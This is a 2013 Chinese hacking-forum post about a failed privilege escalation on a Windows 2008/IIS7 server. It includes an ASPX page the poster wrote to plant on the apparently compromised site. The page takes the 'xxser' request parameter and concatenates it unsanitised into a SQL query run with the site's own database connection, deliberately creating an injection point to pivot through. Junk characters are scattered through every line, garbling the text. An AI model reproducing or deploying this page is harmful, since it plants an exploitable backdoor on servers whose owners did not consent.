昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
& ^* X* a: a6 K7 D其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
& R. \9 k' {$ v! U1 q$ K( j+ ^! n代码量不多,自己写个拉倒了。烦死了。( V( c/ T. z5 u4 |
4 s" U/ A: g2 R9 S7 i7 P0 U! D( s) B6 W# M
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- e# w" ^- O2 I, T- [& z<html xmlns="http://www.w3.org/1999/xhtml">
; R- O/ R. q9 C. K: \# I. n<head runat="server">
+ ]" K; {2 `0 z9 y% a! d <title>暗影aspx构造注射专用页面</title>
& b% ~/ S; X. u</head>
B, s# {9 e' t8 S" r8 F* r) c( r" o<body>+ l! s: P6 c" @
<form id="form1" runat="server">
6 d7 ?' Z$ n/ r. o2 l$ u1 k <div>: E/ U1 U) w9 {" S: k0 a% K( e6 [
<script language="c#" runat="server">1 u3 I2 j: |, V7 B: X0 A
! A* ? A# e; Y+ o0 C% n) W
void page_init(object sender, EventArgs e)
& @& i+ Q8 A6 i$ r2 ` {
! ]+ V: P9 M) f( @
7 t9 L% e C1 N. y7 V7 O' N- q* o System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
( y( G2 M& G, T1 ^+ _$ E4 [3 f4 o + A& W; n) ?: |; w
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString(); G6 E. H1 F: s: Y' u
conn.Open();
( D0 f2 o$ R4 U
$ y4 R u. y! h% |4 M& B$ Y string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=13 y/ g# f% W( ]0 G2 k% k z
_% U1 c8 H5 P System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
% x$ m1 J! S! a( N4 {* u6 v( R3 D int x = command.ExecuteNonQuery();
" X- k; Z1 {& j, w- E' S Response.Write(i+"\n");7 m- r9 ^* Y7 @* m
Response.Write(x);; } Y$ q2 p' }8 Q# Z' {
conn.Close();
w( _7 f7 j7 \; M8 Y z: L }
" A0 G4 e) c( l) c" H
$ w3 T8 D- g2 V6 f3 B. E </script>
7 Z' y5 X, S, v4 c3 c, X </div> H* Q! B* l: A/ Q- U1 d
</form>- z# [: F8 Q5 m9 l& ^
</body>
% j% U4 H+ f- w& l5 D `: v</html>
1 c+ ?5 i+ y: H( V |
发表于 2013-3-20 21:32:01
收藏
支持
反对